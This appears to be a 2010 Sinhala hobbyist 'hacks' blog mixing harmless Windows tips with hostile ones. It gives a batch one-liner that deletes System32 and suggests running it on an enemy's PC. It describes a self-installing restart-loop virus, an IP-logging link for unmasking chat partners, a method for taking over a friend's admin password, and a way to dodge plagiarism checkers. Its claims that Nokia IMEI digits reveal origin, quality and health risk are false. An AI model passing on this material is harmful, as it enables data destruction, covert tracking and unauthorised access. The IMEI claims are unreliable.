හතර වරං හැකිං

සිංහලෙන් Tips Tricks & Hacks කියල මුලින් ආපු අපි ඔන්න අලුත් මුහුනුවරකින්..

අපේ ආරක්ෂාව

මොනව කරන්නත් කලින් අපි ආරක්ෂා වෙලා ඉන්න එපැයි.

මොකක්ද මේ Ethical Hacking

Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks

පරිඝණක වෛරස්

Types of Computer Viruses, Infection Strategies, Antivirus Defense Development.

පොඩි පොඩි software කෑලි

අපිට හදිස්සියට වගෙම නිතර නිතර ඕනෙ වෙන software කෑලි නොමිලේම ගන්න.

The Technical Avenue

මේක තමයි අපේ ඉංගිරීසි අඩවිය. ගිහින්ම බලන්න.

Pages

හොඳ හෝ නරක comment එකක් දාල යන්න අමතක කරන්න එපා.. :)

Monday, May 31, 2010

මොකක්ද මේ Plagiarism Detection Software කියන්නෙ..???


මං මේ ගැන මුලින්ම අහුවෙ අපේ lecturer කෙනෙක්ගෙන්.. එයා assignment එකක් දීල කියල තිබ්බ net එකෙන් copy කරන්න එපා එයාට හොයාගන්න පුලුවන් කියල. මං බැලුව ඇත්තටම එහෙම හොයන්න පුලුවන් software එකක් තියෙනවද කියල. මෙන්න ඒ වගේ බඩ්ඩක්; Viper, the plagiarism checker

මේකෙන් අපේ document එක scan කලහම වෙන්නෙ, මේකෙන් net එකේ ඒහා සමාන දේවල් net එකේ තියෙනවද බලල එහෙම copy කරපුව අහු වුනොත් ඒව highlight කරනව..

මෙන්න මේ site එකට ගිහින් Viper බා ගන්න: http://www.scanmyessay.com/

දැන් ඉතින් assignment කරද්දි ඒ ගැනත් බලන්න වෙනව..
මේකෙන් බේරෙන්න තියෙන්නෙත් මේකම තමයි.. අපේ document එක අපිම scan කරල highlight වෙන ඒව වෙනස් කරල හැදුව නම් වැඩේ ගොඩ.. හික් හික්..

Sunday, May 30, 2010

ඔයාගෙ Nokia phone එක originalද..??


Nokia කියන්නෙ අද ලෝකය පුරා බහුලව අලෙවි වෙන phone වර්ග වලින් එකක්. ඒත් අපි කොහොමද අපේ Nokia phone එක originalද කියල බලාගන්නෙ..??
ඔයාගෙ phone එකේ IMEI(International Mobile Equipment Identity) number එකෙන් ඒක ඔයාට බලාගන්න පුලුවන්.

ඔයාගෙ nokia phone එකෙන් *#06# dial කලාම ඔයාට ඔයාගෙ phone එකේ IMEI number(serial number) එක ලබාගන්න පුලුවන්.
දැන් ඒ number එකේ 7 වෙනි සහ 8 වෙනි අංක දෙක මොකක්ද කියල බලන්න.

උදා:
Serial no. x x x x x x ? ? x x x x x x x

ඒ අංක දෙක,

1. 0 2 නැත්නම් 2 0 නම්, ඔය phone එක assemble කරල තියෙන්නෙ Emirates වල. ඒ phon එකේ quality එක අතින් අන්තිමයි.

2. 0 8 හෝ 8 0 නම්, ඒ කියන්නෙ ඔය phone එක නිපදවා තියෙන්නෙ Germany වල. ඒ phone එක quality එක අතින් හොඳයි.

3. 0 1 හෝ 1 0 හෝ නම් කියන්න තියෙන්නෙ ඔය phone එක ඉතා හොඳ තත්වයක phone එකක්. නිපදවල තියෙන්නෙ Finland.

4. මේ අංක දෙක 0 0 නම් ඒක හොඳම තත්වයෙන් තියෙන original phone එකක්.

5. හැබැයි මේ අංක දෙක 1 3 නම් ඔය phone එක ඉතාම පහත් තත්වයෙන් යුක්ත phone එකක් වගෙම සෞඛ්‍යයටත් අහිතකර phone එකක්. නිපදවල තියෙන්නෙ Azerbaijan වල.

ඔයාගෙ Nokia එක originalද..|???|

ඔයාගෙ desktop එකට එහෙමෙහෙ දුවන පූස් පැටවු ටිකක්..


මේක මං ලඟ තියෙන ලස්සන පොඩි desktop application එකක්. ඔයාගෙ desktop එකට එහෙමෙහෙ දුවන පූස් පැටවු ටිකක් දාගන්න.. ඔයාට කැමති තරමක් දාගන්න පුලුවන්.. මෙතනින් download කරගන්න..

Saturday, May 29, 2010

C program එකක් compile කරන්නෙ කොහොමද??


මගෙ post වල හුඟක් තැන්වලදි "C" programing language එක භාවිතා වුනා.. ඒත් මට පස්සෙ තමයි මතක් වුනේ "C" program එකත් එක්ක වැඩිය ඉන්නෙ නැති කස්ටියට ඒක ප්‍රශ්ණයක් කියල. ඉතින් මං හිතුව C program එකක් compile කරගන්න විදිහ කියල දෙන්න.
මං මෙතනදි භාවිතා කරන compiler එක තමයි Borland C++.



කොහොමද මේක install කරගන්නෙ:

1. මෙතනින් Borland C++ compiler 5.5 එක download කරගන්න.

2. download වුනාම ඒකෙ freecommandlinetools.exe කියල තියෙන file එක run කරන්න.
සාමාන්්‍යයෙන් ඒක install වෙන path එක තමයි; C:\Borland\BCC55

කොහොමද Borland C++ compiler එක configure කරගන්නෙ:

1. Borland C++ compiler එක install කරගත්තට පස්සෙ අලුත් notepad එකක් open කරගෙන පහලින් තියෙන code එක notepad එකට copy paste කරගන්න.

-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”

ඒ notepad එක bcc32.cfg කියල save කරගන්න.

2. දැන් තව අලුත් notepad එකක් අරන් පහලින් තියෙන code එක copy paste කරගන්න.

-L”c:\Borland\Bcc55\lib”

ඒ notepad එක ilink32.cfg කියල save කරගන්න.

3. මේ හදාගත්තු file දෙකම C:\Borland\BCC55\Bin එක අතුලට දාගන්න.

දැන් compiler එක හරි. දැන් වැඩේට බහිමු..



කොහොමද C source code එකක්(.c file එකක්) compile කරගන්නෙ..???

1. ඔයාල මුලින්ම compile කරගන්න ඕනෙ .c file එක C:\Borland\BCC55\Bin එකට දාගන්න.

2. දැන් command prompt එකට යන්න. (Start->Run->cmd කියල type කරල enter කරන්න.)

3. C:\Borland\BCC55\Bin කියන path එක ඔයාගෙ present working directory එක විදිහට හදාගන්න. ඒක කරන්න ඔයා command prompt එකේ මෙහෙම type කරල enter කලා නම් හරි;
CD C:\Borland\BCC55\Bin

4. දැන් ඉතින් compile කරන්නයි තියෙන්නෙ. ඒකට bcc32 කියල type කරල space එකක් තියල ඔයාගෙ .c file එකේ නම .c extension එකත් එක්කම type කරල enter කලා නම් හරි.
උදා:
ඔයාගෙ c programe එකේ නම example.c කියල හිතන්න.
එහෙම නම් ඔයා type කරන්න ඕනෙ මෙහෙමයි; bcc32 example.c

5. ඔයාලගෙ source code එකේ error එකක් නැත් නම් ඔයාලට ඒ location එකේම(C:\Borland\BCC55\Bin) ඔයාලගෙ source code එකේ නමින්ම .exe file එකක් හැදෙයි. කලින් කතා කරපු උදාහරනයට අනුව නම් example.exe කියල file එක හැදෙයි.

6. දැන් ඔයා ඔයාගෙ C source code එකෙන් executable file එක සාර්ථකව හදාගෙන ඉවරයි
දැන් ඔයාලට පුලුවන් මගෙ කලින් postවලතියෙන program complie කරගන්න.

ඔන්න තවත් virus එකක් හදන හැටි..



අද මං පෙන්නන්න යන virus program එකෙන් වෙන්නෙ ඔයා computer එක on කරන හැම වෙලාවකම desktop එක boot වෙද්දිම virus program එකෙන් computer එක restart කරන එක.

මේකෙ coding part එක කරල තියෙන්නෙ "C" language එක use කරල. C ගැන අවබෝදයක් තියෙන කෙනෙකුට ලේසියෙන්ම මේක තේරුම් ගන්න පුලුවන්..


මෙන්න මේකයි code එක:


source code එක මෙතනින් download කරගන්න: DOWNLOAD
Download වෙන file එක SystRe.C කියල ඇති.
දැන් ඒ source code එක compile කරගන්න.

දැන් වැඩේ නම් හරි.. දැන් ඔය compiled file එක, ඒ කියන්නෙ SystRe.exe file එක double click කලොත් දිගටම ඔයාගෙ computer එක මන් කලින් කියපු විදිහට on වෙද්දි restart වෙනව.

දැන් මන් මේකට පිලියමකුත් දෙන්නම්:
1. Computer එක safe mood එකෙන් reboot කරන්න.
2. දැන් C:\Windows\System වලට යන්න.
3. ඒකෙ තියෙන SystRe.exe file එක delete කරන්න.
4. දැන් run එකේ regedit කියල type කරල registry editor එක ගන්න.
දැන් මේ පියවර වලට අනුව යන්න:
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

දැන් දකුණු අත පැත්තෙ ඇති "sres" කියල entry එකක්.
ඒ entry එක delete කරල දාන්න.

දැන් virus එක සාර්ථකව අයින් වෙලා ඇති..

මේකෙදි වෙන්නෙ මොකක්ද????

1. මුලින්ම virus එක විසින් computer එකේ root partition එක හොයාගන්නව.
(windows install කරල තියෙන partition එක)
2. ඊලගට check කරල බලනව virus එක දැනටමත් computer එකේ තියෙනවද කියල.
3. එහෙම නැත්නම් virus එක computer එකට copy කරනව. ඒ එක්කම virus file එක startup එකට දාන්න registry entry එකක් හදනව..
4. එහෙම නැත්නම් virus එක දැනටමත් computer එකේ තියෙනව නම් command එක දෙනව computer එක restart වෙන්න.

සටහන: වඩා හොඳයි icon changer software එකක් භවිතා කරල ඔයාට පුලුවන්නම් .exe file එකට හොඳ icon එකක් දාගන්න. ඔයාට මෙතනින්(http://www.shelllabs.com/) ඒකට ඕන කරන software එක download කරගන්න පුලුවන්..

Friday, May 28, 2010

ඔන්න මගෙන් යාලුවෙක් ඇහුව කොහොමද USB Pen එකක් Ram එකක් විදිහට use කරන්නෙ කියල..


මෙන්න මෙහෙමයි..
1. ඔයාගෙ පෙන් එක computer එකට ගහන්න.

2. My Computer open කරගන්න.

3. Pen drive එක උඩ Right click කරල Properties select කරන්න.

4. දැන් "ReadyBoost" tab එක උඩ click කරන්න.

5. "Use this device" option එක select කරන්න.

6. දැන් ඔයා ඔයාගෙ pen එකෙන් ram එක විදිහට යොදවන්න කැමති ඉඩ ප්‍රමණය සඳහන් කරන්න.

note: මගෙ තියෙන්නෙ windows 7. අනිත් OS වල සමහර විට ටිකක් වෙනස් විදියට ඇත්තෙ. ඒත් වැඩි වෙනසක් නම් නෑ මන් හිතන්නෙ. try කලොත් බැරි වෙන්නෙ නෑ..

** ඔයාගෙ තියෙන්නෙ windows xp නම් ඔයාට මේ වැඩේ මෙහෙම කරගන්න බැරිවෙයි..
ඔයාට http://www.eboostr.com/ site එකට ගිහින් eboostr software එක download කරගන්න වෙනව..

Wednesday, May 26, 2010

කොහොමද IP address එකක location එක හොයාගන්නෙ..??


අපි කලින් කතා කලානෙ අපි chat කර කර ඉන්න කෙනෙක්ගෙ IP address එක හොයාගන්න විදිහ. දැන් බලමු ඒ IP address එකෙන් කොහොමද location එක හොයාගන්නෙ කියල..

ඒක හරිම simple plan එකක්..
ඕනෙ තරම් site තියෙනව IP address trace කරන්න පුලුවන්..
මං කමතිම site එකක් තමයි මේ:
http://www.ip2location.com/demo.aspx

ඔයාලට location එක හොයාගන්න ඕන IP address එක type කරල “Find Location” button එක click කරන්න.

එච්චරයි..

IP address trace කරන්න මීට වඩා හොඳ software එකක් ලඟදිම මං ඔයාලට දෙන්නම්..
IP address එක හොයා ගත්තම තව කරන්න වැඩ හුගක් තියෙනව.. ඉස්සරහට බලමු.. ;)

යාලුවගෙ PC එකේ admin password එක වෙනස් කරමුද??


1. My computer icon එක උඩ right click කරන්න.

2. එන list එකෙන් "Manage" click කරන්න.

3. දැන් ඔය open වෙන window එකේ වම් පැත්තෙ pannel එකේ "Computer Management (Local) tree" click කරල expand කරගන්න. (expand වෙලා තිබ්බෙ නැත්තම්..)

4. “Local Users and Groups” double click කරන්න.

5. දැන් "Users" option එක click කරන්න.

6. දැන් ඔයාලට පෙනෙයි PC එකේ usersල ටික දකුණු පැත්තෙ panel එකේ..

7. “Administrator” උඩ right click කරල “Set Password” option එක click කරන්න.

8. දැන් ඔයාලට warning message එකක් එයි.. ඒකෙ "Proceed" click කරන්න.

9. දැන් system එක අලුතින් password එකක් ඉල්ලයි. ඔයා කමති "password" එකක් දෙන්න.

10. දැන් ඉතින් යාලුවගෙ PC එකේ admin ඔයයි.... :D

Notepad එකෙන් Matrix Effect එකක්..


1. මුලින්ම Notepad එකක් open කරගෙන පහලින් තියෙන code එක copy paste කර ගන්න..







@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


2. දැන් ඒක Save as ගිහින් matrix.bat කියල නම දීල save කරගන්න..

3. දැන් save වුන file එක double click කරල open කරගන්න..

MatRiX effeCt

Keyboard එක Mouse එක විදිහට පාවිච්චි කරන්න ඕනෙද??

හදිස්සියෙ mouse එක වැඩ නැති උනාම මේක ඕනෙ වෙයි..

Alt+Left shift key + NumLock

දැන් එන dialogue box එක OK කරන්න..

අංක පුවරුව mouse pointer එක එහා මෙහා ගෙනියන්න පාවිච්චි කරන්න පුලුවන්.
"+" double click එක විදිහටත්, "-" right click එක විදිහටත් පාවිච්චි කරන්න පුලුවන්.

ඔයත් එක්ක online chat කරන යාලුවගෙ IP address එක හොයාගන්න ඕනිද?? මේක hacking වලට කැමති අයට බොහොම වැදගත් වේවි..


1. මෙතනින් IP Finder script එක download කරගන්න.
DOWNLOAD

2. දැන් නොමිලේ වෙබ් අඩවි host කරන්න දෙන web site එකකට ගිහින්(PHP support වෙන්නත් ඕනි) account එකක් හදා ගන්න.. මන් දන්න හොඳ site එකක් තමයි මේක; http://x10hosting.com/

3. දැන් download කරගත්තු IP_Finder.ZIP file එක extract කරගන්න.
ඒකෙ තියෙන ip.php සහ ip_log.txt file දෙක ඔයාල හදාගත්තු hosting account එකේ File Manager එකෙන් Root Folder එකට upload කරගන්න.

4. දැන් upload කරපු ip_log.txt file එකට Full permision දෙන්න.. (read, write, execute - 777)

දැන් වැඩේ හරි..
ඔයාලට තියෙන්නෙ ඔයත් එක්ක chat කර කර ඉන්න යාලුවට ip.php එකේ link එක යවන්න විතරයි.. යාලුව link එක click කරපු හටියෙ එයාගෙ IP address එක ip_log.txt. එකේ record වෙනව.

ඉතින් IP Address එක හොයගත්ත කියල මොනව කරන්නද?????????
කරන්න නම් වැඩ එමටයි.. ;) ඒව ඉස්සරහට කතා කරමු...

පොඩි ඒත් ටිකක් විතර භයානක virus එකක් හදමුද..??


මේක පොඩි සරල code එකක්.
****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****


1. Notepad එකක් අරන් පහල code එක copy paste කරන්න.

@echo off del c:\windows\system32

2. ඒක කැමති නමකින් save කරගන්න. හැබැයි නම අගට .bat කියල එන්න ඕනෙ.
Eg: virus.bat


****මේක බැරි වෙලාවත් ඔයාගෙ computer එකේ නම් run කරන්න එපා..****
මේකෙන් System32 file එක delete කරනව. Windows crash වෙනව..
වැඩ කරනවද බලන්නම ඕනෙ නම් තරහකාරයෙක්ගෙ PC එකක run කරල බලන්න.. (එහෙම කරන්ඩත් එපා.. පව්නෙ...)

My computer එකේ ඔයාගෙ personal folder එකක් හදාගන්න ඕනෙද?


1. C drive එකට ගිහින් අලුත් folder එකක් හදාගන්න. ඒක ඔයාගෙ නමින් rename කරගන්න. මම මගෙ folder එක hasanka කියල rename කරනව.

2. දැන් start menu එකට ගිහින් Accessories වලින් Command Prompt එක open කරගන්න.

3. දැන් ඒකෙ පහල විදිහට ඔයාගෙ folder එකේ නම දාල type කරන්න.

subst z: c:\hasanka

** මම hasanka කියල දාල තියෙන්නෙ මම C drive එකේ create කරපු folder එකේ නම hasanka නිසයි. ඔයාල ඔයාලගෙ folder එකේ නම එතනට දාන්න.

ඊට පස්සෙ Enter කරන්න.

4. දැන් My computer ගිහින් බලන්න. ඔයාලගෙ personal drive එක ඇති.

**ඔයාලට ඒක ආයෙත් remove කරන්න ඕනෙ උනොත්,
command prompt එක open කරගෙන පහල විදිහට type කරල enter කරන්න.

subst z: /d

ජය ශ්රී...

ඔයා type කරන එක ඔයාගෙ computer එකෙන් කියවගන්න පොඩි code එකක්..





1. Notepad එකක් open කරගන්න.
2. පහල code එක notepad එකට copy paste කරගන්න.





Dim userInput

userInput = InputBox("Write a message for me to say")

Set Sapi = Wscript.CreateObject("SAPI.SpVoice")

Sapi.speak userInput


3. දැන් ඒක Save as ගිහින් කැමති නමකින් save කරගන්න. හැබැයි නම අගට .VBS කියල තියෙන්න ඕනෙ.
Eg: talk.vbs

4. දැන් create වෙච්ච .vbs file එක double click කරල open කරගන්න.
5. දැන් එකෙ ඔයාලට ඕනෙ දෙයක් type කරල OK කරන්න.
දැන් ඔයාගෙ computer එක කතා කරයි....

ඔයාගෙ USB Pen එක හැඩ කරගන්ඩ කැමතිද ??


1. මුලින්ම ඔයා මේ link එකෙන් Apple.ico icon එක download කරගන්න..

(ඔයා ලග වෙන හොද icons තියෙනව නම් ඒව උනත් use කරන්න පුලුවන්..)

2. දැන් download කරගත්තු icon එක pen එකට copy paste කරන්න.
ඊට පස්සෙ එක Right click කරල Properties වලට ගිහින් hide කරගන්න.

3. දැන් Notepad එකක් open කරල පහල code එක copy paste කරගන්න.


[autorun]

icon = Apple.ico

label = Your Name


4. Code එකේ Your Name කියල තියෙන තැනට ඔයගෙ නම දාගන්න.

5. දැන් Save as ගිහින් autorun.inf කියල නම් කරල pen එක ඇතුලෙ save කරගන්න.

6. එච්චරයි.., දැන් Pen එක ගලවල ආයෙ ගහල බලන්න..
ලස්සන icon එකක් එක්ක ඔයගෙ නම තියෙයි.